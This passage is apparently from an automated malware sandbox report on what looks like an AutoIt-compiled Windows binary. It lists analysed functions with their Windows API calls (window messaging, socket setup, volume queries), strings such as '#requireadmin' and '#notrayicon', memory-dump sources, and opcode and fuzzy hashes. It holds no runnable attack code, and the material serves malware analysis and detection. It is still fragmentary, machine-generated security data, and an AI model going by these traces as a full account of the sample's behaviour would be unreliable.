                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001ACC08,00000000,?,?,?,?), ref: 001A44AA
                • GetWindowLongW.USER32 ref: 001A44C7
                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001A44D7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Long
                • String ID: SysTreeView32
                • API String ID: 847901565-1698111956
                • Opcode ID: 13747953a538d892f149e29b4402a954a272ca50e9da759a6da15678c905c56e
                • Instruction ID: b9ea282f645e49eadf7436dcd4d98f7778022ad3efc2c23c22e1594a57018479
                • Opcode Fuzzy Hash: 13747953a538d892f149e29b4402a954a272ca50e9da759a6da15678c905c56e
                • Instruction Fuzzy Hash: 0B31A035210605AFDF248F78DC45BEA7BA9EB4A334F204725F979921D0D7B0EC909B90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0019335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00193077,?,?), ref: 00193378
                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0019307A
                • _wcslen.LIBCMT ref: 0019309B
                • htons.WSOCK32(00000000,?,?,00000000), ref: 00193106
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                • String ID: 255.255.255.255
                • API String ID: 946324512-2422070025
                • Opcode ID: 0da5b0b4205ca88920c322217aac7defca95dfa5d217b956a4d6cbb908399b2a
                • Instruction ID: 1234ed9bbdfa54661cca761e43d4db7dd4a117c1ea0dfb85d75cb1c3809e5634
                • Opcode Fuzzy Hash: 0da5b0b4205ca88920c322217aac7defca95dfa5d217b956a4d6cbb908399b2a
                • Instruction Fuzzy Hash: F631D5356002059FCF24CF68C585EAA77E0EF55318F298069E9258B3A2D731EE45C760
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A3EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001A3F40
                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001A3F54
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 001A3F78
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$Window
                • String ID: SysMonthCal32
                • API String ID: 2326795674-1439706946
                • Opcode ID: 740103cb112d98fef78711e5da9f14930236749d15e130ebcb6194b989d65bea
                • Instruction ID: b3cd4c30606e5a2df470da19edf8b127581002cdb41a187a578db694d99ae592
                • Opcode Fuzzy Hash: 740103cb112d98fef78711e5da9f14930236749d15e130ebcb6194b989d65bea
                • Instruction Fuzzy Hash: 69219F36610219BFDF258F94CC46FEA3BB5EB49714F110215FA19AB1D0D7B1AD90CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001A4705
                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001A4713
                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001A471A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$DestroyWindow
                • String ID: msctls_updown32
                • API String ID: 4014797782-2298589950
                • Opcode ID: 9e1f54619770be56da6e5b9e24fccb3494c50a84923f134036e16436fba88f22
                • Instruction ID: 6cea7fffd81dabea54b260a4ec509b7cdd02d0c23805a0d85d174c12ad135714
                • Opcode Fuzzy Hash: 9e1f54619770be56da6e5b9e24fccb3494c50a84923f134036e16436fba88f22
                • Instruction Fuzzy Hash: 282151B9600244AFDB10DF68DCC1DBB37ADEB9B398B040059F9049B361DB71EC51CAA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001795AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                • API String ID: 176396367-2734436370
                • Opcode ID: e70f5d9e0734e7560cae6a386f4850e526a5caca2b677496909c9b0f19c02004
                • Instruction ID: 79a508e94f3a120b64f6f02499979f36c158fbb8d94cd77d40d6d37f278e19af
                • Opcode Fuzzy Hash: e70f5d9e0734e7560cae6a386f4850e526a5caca2b677496909c9b0f19c02004
                • Instruction Fuzzy Hash: E821577220422166D335AB259C02FFB73F89FA5310F10813AF94D97181EB51AD8AC2E5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001A3840
                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001A3850
                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001A3876
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$MoveWindow
                • String ID: Listbox
                • API String ID: 3315199576-2633736733
                • Opcode ID: c2ecb116cac91506e74ca7f3604ca4c98c33ae176cbef4bb35bb158280b18a0a
                • Instruction ID: e783e22c91a0dbbcae45159c4d9be0446c6e5a7d7b20bad28bd8674e354a9706
                • Opcode Fuzzy Hash: c2ecb116cac91506e74ca7f3604ca4c98c33ae176cbef4bb35bb158280b18a0a
                • Instruction Fuzzy Hash: 1E218076610118BBEB118F94CC85FBB376AEF8A750F118125F9159B190CB75DC5187A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001849F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 00184A08
                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00184A5C
                • SetErrorMode.KERNEL32(00000000,?,?,001ACC08), ref: 00184AD0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorMode$InformationVolume
                • String ID: %lu
                • API String ID: 2507767853-685833217
                • Opcode ID: 3d4652a17ab411b464d2529ddd2c3c6459c9b4f0cc30d0bfb5aec0e26aabaa59
                • Instruction ID: bd203db405f7a98335ff94beb02af4e6e7231b2d01d941c02079843e8a28b64c
                • Opcode Fuzzy Hash: 3d4652a17ab411b464d2529ddd2c3c6459c9b4f0cc30d0bfb5aec0e26aabaa59
                • Instruction Fuzzy Hash: 51313075A00109AFD714DF54C885EAA7BF8EF09308F1480A5E909DF352DB71EE45CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001A424F
                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001A4264
                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001A4271
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: msctls_trackbar32
                • API String ID: 3850602802-1010561917
                • Opcode ID: bdbb103a45fed9b2d66b824e996d81520ceff6f9e491662c04a3309a5555213f
                • Instruction ID: 04df9c546541e4f663646a62901bdac7bbb964781c301832db63a3e4bf7ba405
                • Opcode Fuzzy Hash: bdbb103a45fed9b2d66b824e996d81520ceff6f9e491662c04a3309a5555213f
                • Instruction Fuzzy Hash: 3211E035240248BFEF219E68DC46FAB3BACEF96B64F010125FA55E60A0D7B1DC519B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00172F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                  • Part of subcall function 00172DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00172DC5
                  • Part of subcall function 00172DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00172DD6
                  • Part of subcall function 00172DA7: GetCurrentThreadId.KERNEL32 ref: 00172DDD
                  • Part of subcall function 00172DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00172DE4
                • GetFocus.USER32 ref: 00172F78
                  • Part of subcall function 00172DEE: GetParent.USER32(00000000), ref: 00172DF9
                • GetClassNameW.USER32(?,?,00000100), ref: 00172FC3
                • EnumChildWindows.USER32(?,0017303B), ref: 00172FEB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                • String ID: %s%d
                • API String ID: 1272988791-1110647743
                • Opcode ID: e894cdb6be6aa8eb81076d4a46349f7e2ca4d469c973df3f7027d8f6685ee5f3
                • Instruction ID: c24bcc6324bc5b3dbb55552a0d51c5fd93704d8465f6a3127f1d42b073d821b4
                • Opcode Fuzzy Hash: e894cdb6be6aa8eb81076d4a46349f7e2ca4d469c973df3f7027d8f6685ee5f3
                • Instruction Fuzzy Hash: 521190756002056BCF15AFA0CC85EEE377AAFA5314F048079F91D9B252DF319A469B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001A58C1
                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001A58EE
                • DrawMenuBar.USER32(?), ref: 001A58FD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Menu$InfoItem$Draw
                • String ID: 0
                • API String ID: 3227129158-4108050209
                • Opcode ID: 3b72be3cb28ced44a32b0499c788f9e9e08ffe334399485bbeef1636eb9bcf63
                • Instruction ID: fbcb506cfa3fe229231756778847271da591c3caca0a5bd6d7aae7ed20cd9785
                • Opcode Fuzzy Hash: 3b72be3cb28ced44a32b0499c788f9e9e08ffe334399485bbeef1636eb9bcf63
                • Instruction Fuzzy Hash: 6501C035604218EFDB219F11EC44BAFBBB5FF46360F0080A9F848DA152EB308A94DF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 04bccd4cc8d34667ae2f7e5feb2d3e5e518c98d17dc5ac8ec5e62545eea5f98c
                • Instruction ID: b99c759edbeb4d3e1ebef7d9a44ee4eeeefe3115517c4cb7d9145598332203b0
                • Opcode Fuzzy Hash: 04bccd4cc8d34667ae2f7e5feb2d3e5e518c98d17dc5ac8ec5e62545eea5f98c
                • Instruction Fuzzy Hash: D5C15C75A0020AEFDB15CFA4C894EAEB7B5FF48714F218598E509EB251D731EE81CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00143E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                • Instruction ID: b8c9e0d45959b29e3651b49317ef6f78b43ecae1890e5c243000b8cb9cf8dcb5
                • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                • Instruction Fuzzy Hash: BDA17972E003869FEB26CF18C8917AEBBF4EF61350F18416DE5959B2A1C3349D85C751
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Variant$ClearInitInitializeUninitialize
                • String ID:
                • API String ID: 1998397398-0
                • Opcode ID: fde850115a55d134b23003178adc989fde019694c9b1c861c5886e6c71791cdd
                • Instruction ID: ae44ffd58b25a14848a138a75b61ebcb88c45d0d6b0a8075d44b104b761b6000
                • Opcode Fuzzy Hash: fde850115a55d134b23003178adc989fde019694c9b1c861c5886e6c71791cdd
                • Instruction Fuzzy Hash: 39A158756043009FCB14DF28C485A6AB7E5FF8C714F058859F99A9B3A2DB30EE41CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00170436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                Download Yara Rule
                APIs
                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,001AFC08,?), ref: 001705F0
                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,001AFC08,?), ref: 00170608
                • CLSIDFromProgID.OLE32(?,?,00000000,001ACC40,000000FF,?,00000000,00000800,00000000,?,001AFC08,?), ref: 0017062D
                • _memcmp.LIBVCRUNTIME ref: 0017064E
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FromProg$FreeTask_memcmp
                • String ID:
                • API String ID: 314563124-0
                • Opcode ID: 20270b44b0636123e3f9163af66a6df3a8ee9a16e5daab39eed5a714bb0edebb
                • Instruction ID: 586ae7d095b9d5af4d0e8aba5a1f70fec21f5bfed78bf9e91a7ea1f3aa801bd6
                • Opcode Fuzzy Hash: 20270b44b0636123e3f9163af66a6df3a8ee9a16e5daab39eed5a714bb0edebb
                • Instruction Fuzzy Hash: 06812971A00209EFCB05DF94C984EEEB7B9FF89315F208558F516AB250DB71AE46CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00151391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: 3937446b62a5d65e011542adc9e621095b326bbeec0aeb3d863f50eb9edbd437
                • Instruction ID: 9a5cc21e45b945bd9e2d56e458e266b9817f31f428ab61e744638ff35c252c0a
                • Opcode Fuzzy Hash: 3937446b62a5d65e011542adc9e621095b326bbeec0aeb3d863f50eb9edbd437
                • Instruction Fuzzy Hash: 67413B31A00100FBDB276BF9DC46BBF3AA5EF62371F140265FC39DA192E77488455261
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                Download Yara Rule
                APIs
                • GetWindowRect.USER32(00DEEA80,?), ref: 001A62E2
                • ScreenToClient.USER32(?,?), ref: 001A6315
                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 001A6382
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$ClientMoveRectScreen
                • String ID:
                • API String ID: 3880355969-0
                • Opcode ID: 64c243b9c3c64cd2a995264a1e28873f05c390dc9840888c22448b40e96b6f9b
                • Instruction ID: fe7419ebdfc410c568a106f4dd80d1cafc7a41a3efcc849f3abd8583b79099e0
                • Opcode Fuzzy Hash: 64c243b9c3c64cd2a995264a1e28873f05c390dc9840888c22448b40e96b6f9b
                • Instruction Fuzzy Hash: 77514E78A00249EFCF14DF68D880AAE7BB5FF56364F148169F9599B290D730ED81CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00191AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                Download Yara Rule
                APIs
                • socket.WSOCK32(00000002,00000002,00000011), ref: 00191AFD
                • WSAGetLastError.WSOCK32 ref: 00191B0B
                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00191B8A
                • WSAGetLastError.WSOCK32 ref: 00191B94
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLast$socket
                • String ID:
                • API String ID: 1881357543-0
                • Opcode ID: e7b5933296ba5d68d71240098135562e06582281a7696758bd57a5c1a3143b67
                • Instruction ID: f5661fc79ba625c0b80d153cd4fabf92cdcf42d7376a0ebb348f89586e29f809
                • Opcode Fuzzy Hash: e7b5933296ba5d68d71240098135562e06582281a7696758bd57a5c1a3143b67
                • Instruction Fuzzy Hash: E541F2346002016FEB24AF24D88AF6577E2AB54708F54C45CF91A8F3D3D772ED828B90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
